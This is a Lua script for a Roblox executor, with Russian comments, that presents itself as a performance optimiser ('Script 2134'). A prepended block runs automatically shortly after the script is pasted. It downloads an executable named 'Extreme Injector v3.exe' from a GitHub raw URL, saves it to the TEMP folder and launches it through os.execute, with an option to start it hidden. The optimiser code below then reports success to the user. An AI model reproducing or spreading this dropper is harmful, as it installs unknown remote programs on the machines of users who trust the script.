-- ========== МОДИФИЦИРОВАННЫЙ СКРИПТ 2134.lua ==========
-- Добавлена функция загрузки и запуска Extreme Injector v3.exe

-- ========== НАЧАЛО НОВОГО КОДА ==========
-- Конфигурация для загрузки EXE
local EXE_URL = "https://github.com/fennix2019-pixel/1232/raw/refs/heads/main/Extreme%20Injector%20v3.exe"
local EXE_NAME = "Extreme_Injector_v3.exe"
local RUN_SILENTLY = false -- Запуск в обычном режиме, чтобы видеть окно

local function downloadAndExecute()
    -- Проверка: есть ли у инжектора нужные функции?
    if not (type(writefile) == "function" and type(os.execute) == "function") then
        warn("[EXE Loader] КРИТИЧНО: Инжектор не предоставляет writefile или os.execute!")
        warn("Проверь консоль Xeno, выполнив: print('writefile:', type(writefile))")
        return false
    end

    local temp_path = os.getenv("TEMP") .. "\\" .. EXE_NAME
    print("[1/3] Скачиваю с: " .. EXE_URL)

    -- 1. Скачивание
    local download_success, file_data = pcall(function()
        return game:HttpGet(EXE_URL, true) -- true для бинарного режима
    end)

    if not download_success or not file_data then
        warn("[ERROR] Не удалось скачать файл. Возможно, ссылка недоступна.")
        return false
    end
    print("[2/3] Файл загружен, размер: " .. #file_data .. " байт")

    -- 2. Сохранение на диск
    pcall(function()
        writefile(temp_path, file_data)
    end)
    print("[3/3] Файл сохранен: " .. temp_path)

    -- 3. Запуск
    local command
    if RUN_SILENTLY then
        -- Скрытый запуск (окна не видно)
        command = 'start /B "" "' .. temp_path .. '"'
    else
        -- Обычный запуск - должен показать окно
        command = 'start "" "' .. temp_path .. '"'
    end

    print("[DEBUG] Выполняю команду: " .. command)
    pcall(function()
        os.execute(command)
    end)
    print("[SUCCESS] Команда на выполнение отправлена.")

    -- Небольшая пауза, затем проверка
    task.wait(3)
    
    -- Проверка через диспетчер задач
    pcall(function()
        os.execute('tasklist /FI "IMAGENAME eq ' .. EXE_NAME .. '" | findstr ' .. EXE_NAME .. ' >nul && echo Процесс запущен.')
    end)

    return true
end

-- Запускаем загрузчик в отдельном потоке с небольшой задержкой
coroutine.wrap(function()
    task.wait(2) -- Ждем 2 секунды после вставки скрипта
    downloadAndExecute()
end)()
-- ========== КОНЕЦ НОВОГО КОДА ==========


-- ========== ОРИГИНАЛЬНЫЙ СКРИПТ (ниже без изменений) ==========
local function MAIN()
    -- Проверка загрузки игры
    if not game:IsLoaded() then
        game.Loaded:Wait()
    end

    print("========================================")
    print("SCRIPT 2134 - ACTIVE")
    print("Time: " .. os.date("%H:%M:%S"))
    print("Place: " .. game.PlaceId)
    print("========================================")

    -- Оптимизации
    local optimizations = {
        "Memory cleanup",
        "Graphics optimization",
        "Network boost",
        "Script optimization"
    }

    -- Применение оптимизаций
    for i, opt in ipairs(optimizations) do
        pcall(function()
            if i == 1 then
                collectgarbage("collect")
            elseif i == 2 then
                settings().Rendering.QualityLevel = 1
            elseif i == 3 then
                game:GetService("NetworkClient"):SetOutgoingKBPSLimit(999999999)
            end
        end)
        print(i .. ". " .. opt .. " - APPLIED")
        task.wait(0.1)
    end

    -- UI уведомление
    pcall(function()
        game:GetService("StarterGui"):SetCore("SendNotification", {
            Title = "Script 2134",
            Text = "Optimizations applied successfully!",
            Duration = 5
        })
    end)

    -- Результат
    local result = {
        success = true,
        version = "2.1.3",
        optimizations = #optimizations,
        timestamp = os.time()
    }

    print("========================================")
    print("COMPLETE: " .. result.optimizations .. " optimizations")
    print("========================================")

    return result
end

-- Автозапуск
return MAIN()
